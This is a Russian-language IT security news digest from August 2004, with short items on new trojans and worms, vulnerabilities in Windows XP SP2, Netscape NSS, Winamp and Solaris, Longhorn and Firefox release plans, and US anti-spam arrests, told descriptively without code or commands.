Глава корпорации Microsoft Билл Гейтс объявил год выхода следующей версии пользовательской операционной системы семейства Windows. По словам Гейтса, новая система, имеющая в настоящее время предварительное название Longhorn, выйдет в 2006 году, сообщает CNN. Ранее не исключалось, что новая ОС будет представлена в 2007 году. Новая система станет развитием последней разработки Microsoft в этой области - системы Windows XP. Представители корпорации традиционно заявляют, что система будет более надежной и безопасной, чем предыдущая. Вместе с тем, было объявлено, что с выходом Longhorn Microsoft, вопреки ранее заявленным планам, не представит новую файловую систему WinFS. Как ожидается, WinFS должна прийти на смену использующейся сейчас NTFS и предоставлять более широкие возможности для поиска информации на накопителях. Однако разработчики пришли к выводу, что в заявленные сроки новый стандарт полностью подготовить не удастся, поэтому Longhorn будет базироваться на NTFS, а WinFS будет представлена лишь в бета-версии.
Подробности

27/08/2004 14:56 Червь XF/NetSnake "грызет" электронные таблицы
Компания McAfee зафиксировала появление новой вредоносной программы, получившей название XF/NetSnake. Этот вирус заражает файлы электронных таблиц Microsoft Excel на компьютерах с операционными системами Windows и Mac OS. Червь активизируется автоматически только в том случае, если в настройках Excel определена опция выполнения макросов. После открытия зараженного документа вредоносная программа создает в корневом каталоге диска С: самораспаковывающийся архив с именем cab.cab, содержащий файлы internet.exe, sendto.exe, setflag.exe, normal.dot и normal.xlm. Первые три файла являются компонентами троянской программы NetSnake, два оставшиеся представляют собой инфицированные шаблоны редакторов Word и Excel, соответственно.
Подробности

27/08/2004 12:27 В "Веб-ловушку" в США попались 156 человек
Крупная операция по борьбе с преступниками, действующими в сфере высоких технологий, проведена в США. Как заявил на пресс-конференции в Вашингтоне генпрокурор США Джон Эшкрофт, в ходе операции "Веб-ловушка" арестованы 156 человек, совершившие преступления в 2003-2004гг. Среди правонарушений Г.Эшкрофт выделил рассылку "спама", махинации с кредитными картами, хакерство и онлайн-мошенничество, передает АР. По словам генпрокурора, в 2003г. в США было возбуждено 160 уголовных дел по факту преступлений в компьютерной сфере. Эти преступления нанесли более чем 150 тыс. пострадавших ущерб в размере 215 млн долл. Всего, по информации Дж.Эшкрофта, ежегодно в США ущерб от преступлений в компьютерной сфере составляет не менее 50 млрд долларов. Интересно, что в конце прошлого года в США к 1 тыс. часов общественных работ и штрафу в 2 тыс. долл. был приговорен хакер, взломавший сайт телеканала Al-Jazeera. 24-летний Джона Уильяма Расина признали виновным в "сетевых махинациях" и незаконном вторжении в процесс обмена электронными данными. В свое оправдание обвиняемый заявил, что действовал "из чувства патриотизма". Весной 2003г. хакер взломал несложную защиту сайта и установил перенаправление всех пользователей, которые заходили на сайт компании, на другую веб-страницу, на которой разместил изображение американского флага и надпись, гласящую "Пусть прозвучит свобода". В целом, сайт телеканала Al-Jazeera в результате этой акции не работал три дня подряд. Представители самой катарской телекомпании Al-Jazeera заявили, что во взломе сайта участвовал не один человек, поэтому, по их мнению, приговор "не совсем полон".
RBC

27/08/2004 11:03 Выход OpenBSD 3.6 запланирован на ноябрь
Опубликован предварительный вариант OpenBSD 3.6 Release-notes с описанием всех изменений и новшеств ожидаемых в новом релизе, который запланирован на 1 ноября 2004 года, cообщает opennet.ru. Ниже приведены некоторые, наиболее яркие моменты:
* Поддержка SMP для платформ i386 и amd64;
* Новый DHCP сервер и клиент;
* Новый NTP демон;
* Оптимизатор правил для пакетного фильтра pf;
* Команда tcpdrop для принудительного завершения TCP соединений;
* Опция NMBCLUSTERS устранена, тюнинг производится через sysctl;
* Команда md5 может подсчитывать контрольные суммы md4, sha256, sha384 и sha512;
* hotplugd демон;
* Увеличена производительность NFS;
* Поддержка оборудования: USB 2.0, Sangoma T1/E1, AIC79xx-based Ultra320 SCSI (Adaptec 29320, 39320), atw wireless driver, hw.setperf для PowerNow в AMD K6/K7;
* Обновление ПО: OpenSSH 3.9, XFree86 4.4.0, Gcc 2.95.3 и 3.3.2, Perl 5.8.5, Apache 1.3.29, OpenSSL 0.9.7d, Sendmail 8.13.0, Bind 9.2.3.
Подробности

27/08/2004 10:25 Mozilla Firefox 1.0 лишится некоторых возможностей
Стало известно о том, что в финальную версию браузера Mozilla Firefox не будут включены некоторые возможности из тех, что были доступны в предыдущих версиях. Причина вполне тривиальная - нехватка времени для отладки и приведения всего в надлежащий вид. По заявлениям разработчиков, версия 1.0 должна стать исключительно стабильной, так что от неполностью готовых функций придется отказаться. Так, из браузера будет исключена поддержка оффлайнового режима, аналогичного тому, что доступен в большинстве современных браузеров. Из финальной версии также будет исключено окошко выбора профиля пользователя. Также будет убрана консоль для отладки JavaScript. Следующая жертва борьбы за стабильность - поддержка альтернативных таблиц стилей. Она была признана неготовой, однако планируется вернуть эту возможность в одной из последующих версий. И наконец, будет отключена функция, позволявшая отметить определенную страницу в меню "Закладки", с тем чтобы браузер проверял ее время от времени и сообщал пользователю об обновлении. Обещают, что Mozilla Firefox 1.0 выйдет этой осенью. Пока же пользователям браузера остается надеяться, что наиболее важные из функций все же будут оставлены или доработаны и заново включены в одну из ближайших версий.
"Компьюлента"

27/08/2004 10:19 Крэш-тест для Касперского
Как известно, недавно господин Касперский энд соучастники выступил с очередным пророческим заявлением, в котором предрекал скорую гибель Интернета в результате скоординированной атаки неких гипотетических террористов, которая должна была случиться вчера, 26 августа. Как видите, 26 августа благополучно прошло, Интернет как был жив, так и поныне живёт. Разумеется, "пророчество" господина Касперского не могло оставить равнодушными сетевые СМИ. "Компьютерра-Онлайн" попросила специалистов по компьютерной безопасности прокомментировать громкие заявления Касперского. В качестве специалистов выступили: Константин Архипов - руководитель российского представительства Panda Software, Андрей Каримов - руководитель отдела антивирусных исследований Proantivirus Lab, Дмитрий Леонов - специалист по компьютерной безопасности (bugtraq.ru). Предлагаем посетителям нашего сайта ознакомиться с их комментариями по каждому утверждению.
Cтатья в "Компьютерре"

27/08/2004 09:27 Начался новый этап распространения второго сервис-пака для Windows XP
Компания Microsoft начала новый этап распространения второго сервис-пака к операционной системе Windows XP, сообщает InfoWorld. Теперь это обновление доступно всем пользователям англоязычного варианта этой операционной системы. Начиная с 25 августа, сервис-пак начал поступать в виде автоматического обновления для Windows XP Professional и появился в службе Windows Update. Полная версия сервис-пака, напомним, появилась на сайте Microsoft 9 августа, а на прошлой неделе пакет обновлений начал автоматически поступать на компьютеры Windows XP Home. Одновременно продолжается и выпуск локализованных версий сервис-пака. В нестоящее время доступны для скачивания варианты пакета обновлений на английском, немецком, французском, корейском и китайском (варианты для традиционного и упрощенного письма) языках. Русскоязычная версия обновления выйдет в сентябре нынешнего года. Всего же на выпуск локализованных версий отведено два месяца. К октябрю сервис-пак должен будет быть установлен на 100 млн. компьютеров по всему миру.
Подробности

27/08/2004 09:20 Nokia обеспечит защиту многофункциональных телефонов
ПО шифрования позволит защищать данные пользователей мобильных телефонов, хранящиеся в трубках и картах памяти. Nokia планирует сотрудничать со шведской секьюрити-фирмой Pointsec Mobile Technologies в сфере разработки инструмента шифрования для многофункциональных телефонов. Средства защиты Pointsec for Symbian OS будут выпускаться для устройств Nokia Series 60 и Series 80 и поступят в продажу в третьем квартале через реселлеров и системных интеграторов Pointsec. Первым телефоном, для которого выйдет ПО шифрования, станет Nokia 9500 Communicator. Оно защитит такие данные, как e-mail, текстовые и мультимедийные сообщения, календарь и адресная книга, а также информацию, хранящуюся на картах памяти. Одно время для безопасного обращения с трубкой достаточно было беречь ее от любопытных глаз. Однако люди все чаще опираются на сотовый телефон при передаче и приеме данных, и их защита становится все более серьезной проблемой. В июне появился вирус Cabir, поражающий смартфоны с операционной системой Symbian. А в июле Nokia выпустила обновление для телефонов с поддержкой Bluetooth, уязвимых к так называемому «блюснарфингу» — трюку, который позволяет злоумышленникам читать, изменять и копировать данные календаря и контактов, не оставляя никаких следов.
Подробности

26/08/2004 17:35 И ещё одна уязвимость в WinXP SP2
Количество уязвимостей, обнаруживаемых в недавно вышедшем SP2 увеличивается чуть ли не каждый день. Самое интересное, что первоочередной задачей-то SP2 было как раз усиление защищённости Windows XP. Как сообщает PC Magazine, анонимный источник сообщил им об обнаружении уязвимости в новой компоненте, введённой в SP2, под названием Windows Security Center (WSC). W3C в графическом виде показывает состояние ключевых компонентов защиты системы - встроенный файрволл, обновления (апдейты) и состояние антивируса. В случае деактивации файрволла, либо устаревания баз антивируса пользователю будет выдано сообщение. Информация накапливается во внутренней базе данной, которая управляется подсистемой WMI - Windows Management Instrumentation. Изучив механизм взаимодействия WMI с WSC, был сделан вывод, что любая сторонняя программа, написаннная с использованием WBEM API, может подменить базу данных, накапливаемую и используемую WSC. WBEM - Web-Based Enterprise Management, является стандартом для доступа к управлению информацией системы. WMI от M$ является по сути своей просто реализацией этого стандарта. Ввиду недостаточной продуманности вопроса защиты базы WMI доступ к ней может получить любое десктоповое приложение, написаннное либо на одном из Вэб-скриптовых языков, либо в качестве модуля ActiveX. Наличие подобной "фичи" в SP2 предоставляет широкое поле для деятельности как различных вирусописателей, так и для загрузки произвольных файлов со злонамеренных сайтов. M$ была поставлена в известность, однако реакция мегакорпорации была стандартной: "Мы не видим большой опасности в этом, однако будем это исследовать".
Подробное описание

26/08/2004 16:58 Смени браузер и поделись радостью с другими
В Интернете открылся довольно занимательный сайт под названием "Browse Happy". Сайт создан и поддерживается некоммерческой группой Web Standards Project (WaSP). Собственно, на сайте рассказывается то, что уже итак всем давно известно - о дырявости "браузера всех времён и народов", в качестве альтернативы рекомендуют очевидное - перейти на более безопасные браузеры - Mozilla, Firefox, Opera. Также опубликованы рассказы счастливчиков перешедших с ослика на альтернативные браузеры.
Сайт

26/08/2004 16:13 WinXP SP2 скоро выйдет на CD
Пользователи Windows XP, не желающие качать тяжеловесный сервис-пак по сети, уже в сентябре смогут приобрести легальную CD-версию. Ожидается, что CD-версия будет особенно популярной среди домашних пользователей, сидящих на модемном или же тарифицируемом xDSL-соединении. Правда, пока не ясно, насколько легко можно будет получить заветный диск: на сегодняшний день, если верить ZDNet UK, Microsoft подготовила всего миллион компактов с дистрибутивом SP2, которые будут распространяться в качестве бесплатного вложения в компьютерных журналах «где-то с сентября». Точная дата выхода будет зависеть от графиков выхода собственно журналов. Понятное дело, что бесплатных дисков на всех не хватит. Следовательно, будем надеяться на пиратов. Есть подозрение, что на рынках заветные компакты появятся еще до конца этого месяца.
Internet.Ru

26/08/2004 15:57 Новый поисковик для поиска Windows-эксплоитов
Некто Dav1d анонсировал в списке рассылки Bugtraq созданный им поисковый сервис, основной задачей которого является поиск эксплоитов ОС Windows для определённой уязвимости. Например, можно найти эксплоит для уязвимости, описанной в бюллетене Microsoft - MS03-026, либо по названию уязвимосй службы - RPC DCOM.
Адрес сайта

26/08/2004 14:39 От MS Office может пострадать каждый
Наличие метаданных в документах, создаваемых с помощью ПО Microsoft Office, несёт серьёзную угрозу конфиденциальности информации как для частных, так и для корпоративных пользователей. Сами по себе метаданные являются всего лишь служебными записями, пренебрежение которыми может иметь далеко идущие последствия. Метаданные представляют собой скрытую информацию, хранящую историю документа — начиная от имени автора и заканчивая целыми абзацами, которые были удалены в ходе редактирования документа. Обычно такие данные игнорируются авторами документов и полностью открыты для использования сторонними лицами, что может привести к раскрытию конфиденциальной информации. В документах, создаваемых с помощью Microsoft Office, содержится более 25 различных типов метаданных. При этом, чем больше сотрудников работают с документом, тем выше риск того, что в файле останутся данные, не видные на первый взгляд. Одной из жертв утечки метаданных стал премьер-министр Великобритании Тони Блэр. В его документах, касающихся вторжения в Ирак, была обнаружена информация, отличающаяся от официальной позиции правительства страны. Еще один пример: в документах SCO Group были обнаружены метаданные, свидетельствующие о том, что эта компания собиралась подать иск против Bank of America. Компания Workshare, специализирующаяся на создании приложений для модификации контента, выпустила предупреждение о возможности утечки информации, скрытой в офисных документах, созданных с использованием ПО Microsoft Office. Информация об этой угрозе и возможностях её ликвидации размещена на специально созданном сайте Metadatarisk.org. Кроме того, Workshare представила также обновление приложения Protect, версию 3.0, предназначенного для удаления метаданных из документов, созданных с помощью Microsoft Office. Protect 3.0 позволяет удалять метаданные в таких приложениях Microsoft, как Excel, PowerPoint и Word. Приложение интегрируется с почтовыми клиентами Lotus Notes, Novell GroupWise и Microsoft Outlook, удаляя метаданные в отсылаемых документах.
Подробности

26/08/2004 14:24 Уязвимость в библиотеке Netscape NSS
Компания Internet Security Systems (ISS) предупреждает о наличии критической уязвимости в библиотеке Netscape Network Security Services (NSS), входящей в состав многих широко распространенных программных продуктов ("Компьюлента"). Данный компонент, разрабатывавшийся сообществом Mozilla Foundation, в частности, является одним из модулей таких пакетов, как Netscape Enterprise Server, Netscape Personalization Engine, Netscape Directory Server, Netscape Certificate Management Server и Sun One/iPlanet. Как сообщается, проблема связана с неправильной обработкой SSLv2-пакетов (Secure Sockets Layer версия 2). Библиотека NSS не проверяет длину данных, содержащихся в поле "Hello Message". Данная особенность может использоваться злоумышленниками для вызова ошибки переполнения буфера на удаленном компьютере и последующего выполнения на нем произвольного программного кода. Следует заметить, что поддержка SSLv2 по умолчанию отключена в Netscape Enterprise Server и Sun One. Тем не менее, данный протокол очень широко применяется различными веб-службами при передаче важной информации через интернет, поэтому многие администраторы активируют поддержку SSLv2. Впрочем, сообщество Mozilla Foundation уже выпустило соответствующую заплатку и настоятельно рекомендует установить ее всем пользователям вышеназванных программных продуктов. Найти обновление можно на этой странице, кроме того, защититься от возможных атак можно путем отключения протокола SSLv2.
Описание уязвимости

26/08/2004 14:10 Microsoft предлагает руководство по SP2-совместимости
Microsoft выпустила самоучитель для ИТ-профессионалов, оценивающих совместимость своего ПО с Windows XP Service Pack 2. Опасения системных администраторов и ИТ-менеджеров по поводу того, что их корпоративные приложения могут оказаться несовместимымм с XP SP2, уже привели к отказу некоторых предприятий от обновления. Чтобы вернуть пользователей на верный путь и понизить артериальное давление разработчиков, Microsoft выпустила руководство по проверке ПО на совместимость. Документ, который можно скачать из Microsoft Download Center, призван помочь системным администраторам «выявить и решить проблемы совместимости приложений». Microsoft добавляет, что руководство предназначено для сетей любого размера и «подходит как для одноранговых сред, так и для сред Active Directory». Легким чтением руководство объемом свыше 100 страниц не назовешь. В нем перечислены те изменения, которые SP2 может привнести в машины под Windows ХР, способы выявления проблем несовместимости и способы устранения этих проблем. Кроме того, руководство содержит два возможных пути установки для тех, кто не знает, как развернуть сервиспак на своем предприятии. Microsoft предупреждает: «Повышенная степень защиты сетевой среды (которую обеспечивает SP) может привести к тому, что легитимные приложения или функции не будут работать ожидаемым образом… а приложения, не отвечающие требованиям этой усиленной защиты, могут проявлять признаки несовместимости». Руководство дает советы по реконфигурированию ХР с целью облегчения условий совместимости приложений, но добавляет: «Эта процедура не рекомендуется, но в краткосрочной перспективе может оказаться необходимой». Однако линия партии Microsoft заключается в том, что винить во всем надо приложения, а не операционную систему, и что когда администраторы закончат все операции, параметры безопасности должны оставаться на самом высоком уровне.
Руководство от Microsoft

26/08/2004 14:04 Американцы арестовали десятки своих спамеров
За несколько последних недель федеральные агентства США арестовали несколько десятков человек, подозреваемых в рассылке спама и онлайновых преступлениях, сообщает сайт газеты The New York Times. Полный список уголовных дел в отношении интернет-преступников будет объявлен генеральным прокурором США Джоном Эшкрофтом 26 августа. Закон, предусматривающий наказание за рассылку спама, был принят Конгрессом в декабре прошлого года. Однако до недавнего времени никаких видимых результатов, связанных с его принятием в США не наблюдалось. Согласно исследованиям компании Symantec, доля спама в общем почтовом трафике с момента принятия закона возросла на 7% и составляет теперь 65%. В числе арестованных оказались и лица, подозреваемые в интернет-мошенничествах. Их задержание стало возможным благодаря тесному сотрудничеству правоохранительных органов и представителей интернет-структур. Вместе с агентами ФБР мошенникам противостоят члены некоммерческой организации National Cyber-Forensics and Training Alliance. Масштабная операция по борьбе с киберпреступниками называлась Slam Spam. Значительная ее часть финансировалась за счет "Ассоциации прямого маркетинга". "Мы почувствовали, что ключом к работе нового закона являются силовые действия. Мы хотим, чтобы спамеры осознали: спам для них - не свободная игра, и за него можно понести наказание", - заявил президент Ассоциации Роберт Винцен (Robert Wientzen). В ходе операции Slam Spam агенты ФБР составили базу известных спамеров. Участники операции даже приобрели несколько товаров, рекламируемых спамерами. Таким образом, они смогут установить личности заказчиков рекламных рассылок. В ходе выступления представителей Министерства юстиции, назначенного на четверг, возможно, будут оглашены меры, которое правительство предпримет в дальнейшем для борьбы со спамом. Еще в мае руководители ФБР сообщали, что занимаются разработкой уголовных дел в отношении более чем 50 активных спамеров. Прокуроры намеревались представить первые итоги антиспамерской операции летом. Однако вновь открывшиеся обстоятельства расследования помешали им это сделать.
Источник

26/08/2004 13:43 Новый алгоритм сможет отсеять почти весь спам
Новый алгоритм для распознавания спама изобретен биологами исследовательского центра TJ Watson в Нью-Йорке, принадлежащего компании IBM. Он основан на методе, который используется учеными для анализа генетических последовательностей, сообщает BBC News. Работа над алгоритмом, названным "Чунг-Квей" (Chung-Kwei), начались около года назад. Ученые взяли за основу алгоритм "Терезиас" (Teiresias), который был создан для поиска отличающихся ДНК и аминокислот в повторяющихся образцах. Разработчики полагают, что алгоритм может использоваться в различных областях, не только в биологии. Письма электронной почты воспринимаются алгоритмом "Чунг-Квей" как молекулы ДНК, состоящие из множества символов. Перебирая письмо за письмом, программа накапливает собственную базу последовательностей символов, встречающихся в двух и более письмах. К примеру, слово "Виагра", найденное в нескольких тысячах писем, было внесено в базу шаблонов спама, и в дальнейшем сообщения, содержащие данное слово, будут распознаваться как нежелательные. При проведении тестовых испытаний на проверку 88 тысяч сообщений программой было потрачено 15 минут, и в 97 процентах случаев алгоритм верно распознал почтовый мусор.
lenta.ru

26/08/2004 13:33 Опасная уязвимость в Winamp
Secunia выпустила сообщение предупреждающее об обнаруженной уязвимости в популярном проигрывателе Winamp. Уязвимы версии WinAMP 3.x и Winamp 5.x. Проблема обнаружилась формате скинов для Winamp, которые представляют из себя zip архив и имеют расширение .wsz. Собщается что злоумышленник может создать специальный файл скина и разместить его на веб сайте, что в случае скачивания его пользователем приведет к выполнению произвольного кода на машине жертве. В случае если броузером является Internet Explorer, это может произойти без ведома пользователя. Дело в том, что XML документ, присутствующий в файле скина может содержать в теге "browser" ссылку на HTML документ, который откроется в броузере в локальной зоне безопасности ("Local computer zone"). Это может быть использовано для закачивания и запуска произвольной программы, внедренной тегом "object" с "codebase" атрибутом. Secunia оценила степень опасности уязвимости как "чрезвычайно критичная" (Extremely critical). Уязвимость подтверждена на последней версии Winamp 5.04 с полностью пропатченной системой Windows XP SP1 и Internet Explorer 6.0.
secunia.com

25/08/2004 15:10 Symantec выпустила патчи для своих продуктов
Symantec выпустила патчи для различных версий своих продуктов, сообщает секьюрити-компания Secunia. Уязвимость, присутствующая в продуктах, позволяла злоумышленникам провести DoS (Denial of Service) атаку. И хотя Secunia оценила степень опасности этой уязвимости как "средне критичную" (moderately critical), Symantec выпустила патчи для решения проблемы. Затронутые продукты: VelociRaptor 1.5, Gateway Security 1.0 и 2.0, и Enterprise Firewall/VPN 7.x для Solaris и Windows NT/2000.
Подробности и патчи:

25/08/2004 15:09 Компьютерный вирус ворует экзаменационные билеты
Peopledaily.com сообщает о том, что в китае обнаружили появление необычного вируса для ПК, похищающего файлы относящиеся к экзаменационным листам. Согласно заявлению, вирус, полчивший название "exam theft", ищет файлы форматов Microsoft Word и Excel, содержащие слова, относящиеся к экзаменам, например "exam" или "test questions", и отсылает на определенный веб сайт. Китайская секьюрити-компания Jiangmin сообщила, что не видит непосредственной связи между появлением этого вируса и похищением экзаменационных билетов несколько месяцев назад, когда экзаменационные билеты и ответы к ним оказались доступны в интернете за несколько часов до начала единого государственного экзамена, а печатные версии экзаменационных листов продавались на нескольких сайтах за тысячи юаней.
peopledaily.com.cn

25/08/2004 14:37 Троян Mitglieder превращает компьютер в спам-машину
Компания Symantec сообщает о появлении новой модификации вредоносной программы Mitglieder. Троян Mitglieder.О после проникновения на компьютер с Windows записывает собственные копии с именами foх.exe, norat.exe, winerdir.exe в системную директорию и модифицирует реестр, обеспечивая себе автоматический запуск при старте ОС. Далее Mitglieder.О пытается завершить процессы, связанные со службами безопасности и антивирусными пакетами. Кроме того, троян открывает и прослушивает порт 28883, что теоретически позволяет злоумышленникам использовать инфицированную машину в качестве платформы для рассылки спама.
symantec.com

25/08/2004 14:36 Троян Droz ворует номера кредитных карт
Компания Sophos сообщает об обнаружении новой вредоносной программы Droz. Этот троян, заражающий компьютеры с операционными системами Windows, может использоваться злоумышленниками для кражи персональной пользовательской информации - номеров кредитных карт, паролей и пр. После проникновения на машину Droz осуществляет сканирование реестра с целью поиска сохраненных в нем паролей. Кроме того, троян сканирует жесткий диск С и составляет список записанных на нем файлов с расширениями cer, kwm и pwm. Собранная информация впоследствии отправляется автору. Широкого распространения вредоносная программа
compulenta.ru

25/08/2004 14:34 Вирус для 64-разрядных Windows
Вирус W64.Shruggle, обнаруженный компанией Symantec, похоже, является только экспериментальной разработкой и не рассчитан на «дикое» распространение. Тем не менее, у владельцев 64-разрядных Windows появился еще один повод для огорчения. Как выразился один из руководителей Symantec по проблемам компьютерной безопасности Альфред Хьюгер (Alfred Huger), самым интересным известием в данном случае можно считать сам факт появления вирусов для 64-разрядной версии Windows. Если создатели вирусов для Win98/2000/XP движимы, как пишет CNET, в основном, мотивами личной выгоды и, в клинических случаях, жаждой самоутверждения, то автор W64.Shruggle потратил время на перспективную разработку, которая станет актуальной лишь к следующему году, когда появится достаточно много машин, на которых будут установлены операционные системы Microsoft, поддерживающие 64-битные «расширения».
internet.ru

25/08/2004 14:34 Уязвимость в Sun Solaris - увеличение привилегий
Secunia опубликовала сообщение об обнаруженной уязвимости в Sun Solaris CDE Mailer, которая может привести к повышению локальных привилегий. Уязвимость обнаружена в CDE 1.4 и 1.5 в Sun Solaris 8 и Sun Solaris 9, степень опасности - "некритичная" (Less critical). Уязвимость, обнаруженная iDEFENSE, возникает из-за ошибки форматирования строки в CDE Mailer (dtmail). Успешное использование уязвимости приводит к запуску произвольного кода с правами mail group, позволяющим пользователю читать, писать и удалять письма других пользователей. Выпущен патч, закрывающий уязвимость.
Secunia Advisory, Sun Microsystems Advisory
Патчи:
CDE 1.4 for Solaris 8 - SPARC Platform
CDE 1.5 for Solaris 9 - SPARC Platform
CDE 1.4 for Solaris 8 - x86 Platform
CDE 1.5 for Solaris 9 - x86 Platform

25/08/2004 14:33 Авторское право с позиции законодательства Украины
Материал под таким названием опубликовал "Центр исследования компьютерной преступности" (crime-research.ru). Интеллектуальная собственность все чаще становится причиной споров и судебных исков. Львиная доля правоотношений в сфере интеллектуальной собственности урегулирована международными нормами, действующими на территории Украины – Парижская конвенция по охране промышленной собственности, Мадридское соглашение о регистрации знаков и др. Украина ратифицировала большинство международных конвенций по защите авторских прав и прав промышленной собственности. Глобализация и появление международных институтов, таких как ВТО, сделали вопрос прав собственности уже не внутренним делом каждой страны, а необходимым условием участия в международной жизни.
Подробнее

25/08/2004 14:33 В Сети обнаружен червь-вуайерист
Червь Rbot-GR следит за обладателями веб-камер. Вредоносная программа, как пишет The Register, является одним из вариантов сетевого червя Rbot, самостоятельно распространяющегося через интернет и устанавливающего на зараженных компьютерах «черные ходы». Единственное отличие червя-вуайериста от его более ранних версий состоит в том, что он наделен способностью управлять подключенными к компьютерам жертв веб-камерами и микрофонами. Таким образом, сообщает антивирусная компания Sophos, владельцы инфицированных машин, сами того не ведая, становятся участниками своеобразного «застеколья», транслируемого для одного человека – автора червя. Но основная задача Rbot-GR состоит в поиске регистрационных ключей к электронным играм, а также в похищении паролей к службе мгновенных денежных переводов PayPal. Червь работает только с машинами на базе Windows и пока ему присвоен «средний» уровень опасности.
internet.ru

25/08/2004 14:32 В России вирусными программами заражено "5-10% компьютеров, подключенных к интернету
РИА "Новости" сообщает, В России вирусными программами могут быть заражены 5-10% компьютеров, подключенных к Интернету. Об этом заявил во вторник на пресс-конференции в РИА "Новости" Евгений Касперский, руководитель Антивирусной лаборатории Касперского. "Атак хакеров становится все больше и больше. На данный момент осуществляется примерно 30-40 атак в неделю. Большинство программ-шпионов охотится за банковскими счетами", - сказал Касперский. Однако, в России банковскими счетами через Интернет пользуются крайне редко, поэтому подобные атаки для российских пользователей не представляют опасности. Спам по мнению Касперского, также представляет серьезную опасность. За рассылку спама в России существует только административная ответственность - штраф, в то время как в США и Западной Европе применяется уголовное наказание.
rian.ru

25/08/2004 14:32 Эксперты предупреждают о интернет-атаке террористов
РИА "Новости" сообщает, эксперты предупреждают о мощной интернет-атаке террористов, которая может состояться 26 августа. "У них (террористов) есть достаточно знаний и опыта для парализации работы Интернета. Интернет может прекратить свою работу на несколько часов", - сказал на пресс-конференции в РИА "Новости" один из ведущих российских антивирусных экспертов Александр Гостев. По его словам, информация о готовящейся атаке была опубликована на специализированных сайтах. "Ее достоверность оценить сложно, - сказал Гостев. - Мы оцениваем те возможности и те средства, которыми обладают террористы, и они вызывают наши опасения". Он сказал, что в первую очередь от атаки пострадают США и Западная Европа, в меньшей степени - Япония. Евгений Касперский, руководитель антивирусной лаборатории Касперского, отметил, выступая на пресс-конференции в РИА "Новости", что военным объектам России такая опасность не грозит, потому что они "находятся на значительном удалении от Интернета". "Меньше всего пострадают страны, которые меньше других зависят от Интернета, например Афганистан", - сказал Касперский.
rian.ru

25/08/2004 14:32 Panda Software представила корпоративные антивирусы
Компания Panda Software расширила линейку антивирусов до корпоративных продуктов. Новые продукты основаны на технологии TruPrevent, которая позволяет анализировать поведение подозрительных программ и блокировать их без вмешательства пользователя. Решения обеспечивают обнаружение вирусов на основе анализа поведения, защиту от переполнения буфера, определение политик безопасности и уничтожение остаточных эффектов от атак. Решение EnterpriSecure предназначено для крупных компаний. Предприятия малого бизнеса могут использовать usinesSecure для защиты рабочих станций и файловых серверов и BusinesSecure Exchange для защиты почтовых серверов xchange. Антивирус ClientShield предназначен для защиты любых рабочих станций.
viruslab.ru

25/08/2004 14:31 Автор червя MSBlast признал свою вину в суде
19-летний американец Джеффри Ли Парсон признал себя виновным в создании и распространении интернет-червя MSBlast версии "b" (детектируется Антивирусом Касперского как Worm.Win32.Lovesan.a), в августе прошлого года поразившего миллионы компьютеров во всем мире, сообщает агентство Europa Press. Помимо лишения свободы на срок от 18 до 37 месяцев Парсона ожидает выплата многомиллионных компенсаций. В результате эпидемии MSBlast многие компании понесли серьезные убытки. Приговор вирусописателю, арестованному в штате Миннесота в прошлом году, должен быть вынесен в ноябре.
viruslist.ru

25/08/2004 14:31 Вирусы заражают незащищенный компьютер в течение 20 минут
Компьютер с несвоевременно обновленной операционной системой и антивирусной базой заражается вредоносными программами в первые 20 минут с момента его подключения к глобальной сети. К такому выводу пришли аналитики института SANS. В 2003 году среднее время заражения "чистой", не защищенной машины составляло около 40 минут. В этом году период "выживания" снизился до 20 минут, в то время как компьютеры пользователей выделенных линий и плохо защищенных локальных сетей заражаются вредоносными программами в течение первых 10 минут после подключения к сети. "Главная проблема заключается в том, что время загрузки и установки критических обновлений операционной системы превышает время, в течение которого вирусы проникают в компьютер", - отмечают исследователи. Производители антивирусного программного обеспечения дают еще более пессимистичные оценки. По мнению сотрудников компании Symantec, в скором будущем заражение незащищенного компьютера будет занимать секунды, а не минуты. Для изучения ситуации с распространением вредоносных программ Symantec специально эксплуатирует слабо защищенную сеть. Эксперты компании зафиксировали случаи заражения этой сети вирусами трех-четырехлетней давности.
viruslist.ru

25/08/2004 14:30 Досрочно уволенный программист переквалифицировался в хакеры
Reuters сообщает, бывший сотрудник американской компании Varian Semiconductor Equipment Associates Патрик Энгл (Patrick Angle) незаконно проник в сеть своего предприятия и повредил часть ее программного обеспечения. С таким заявлением выступили агенты ФБР и федеральный прокурор. 34-летний Энгл подключился к корпоративному серверу Varian и удалил исходные коды, которые разрабатывал вместе с бывшими коллегами. По данным следствия, эти действия Энгл совершил после того, как узнал о своем досрочном увольнении. Если Энгла признают виновным в несанкционированном доступе к компьютерной информации, ему грозит лишение свободы на срок до 10 лет и штраф в размере до 250 тыс. долларов. В Varian заявили, что быстро обнаружили изменения в программном обеспечении и уже устранили все последствия деяний Энгла.
viruslist.ru

25/08/2004 14:30 Новые троянские программы атакуют клиентов бразильских банков
Новые троянские программы, обнаруженные в Бразилии, крадут информацию об онлайновых реквизитах клиентов банков, сообщает сайт IT Vibe. Troj/Banker-AR Trojan и Troj/Banker-K Trojan используют схему, похожую на "фишинг". Эта схема онлайнового мошенничества в последние месяцы становится все более распространенной. Мошенники организуют массовую рассылку писем по электронной почте от имени банков и просят пользователей подтвердить свои персональные данные. Пользователю предлагается посетить фальшивый сайт, внешне очень похожий на настоящий банковский ресурс. Вся информация, введенная в окнах и поисковых строках этого сайта, оказывается в распоряжении мошенников. Авторам новых троянцев не требуется проводить почтовую рассылку и создавать фальшивые сайты. После заражения компьютера троянские программы отслеживают, какие ресурсы посещает пользователь, находясь в интернете. Как только пользователь заходит на сайт банка, Troj/Banker-AR Trojan и Troj/Banker-K Trojan открывают собственное выплывающее окно (pop-up), в котором просят пользователя ввести логин и пароль. "В отличие от традиционных схеме фишинга, пользователь может стать жертвой мошенников даже в том случае, если он посещает настоящий банковский сайт", - прокомментировал появление новых троянцев представитель производителя антивирусного программного обеспечения Sophos. Troj/Banker-AR Trojan и Troj/Banker-K Trojan настроены для работы только с клиентами бразильских банков. Однако такая программа вполне может быть адаптирована для атаки жителей любого государства.
viruslist.ru

25/08/2004 14:29 Троян Tofger собирает личную информацию
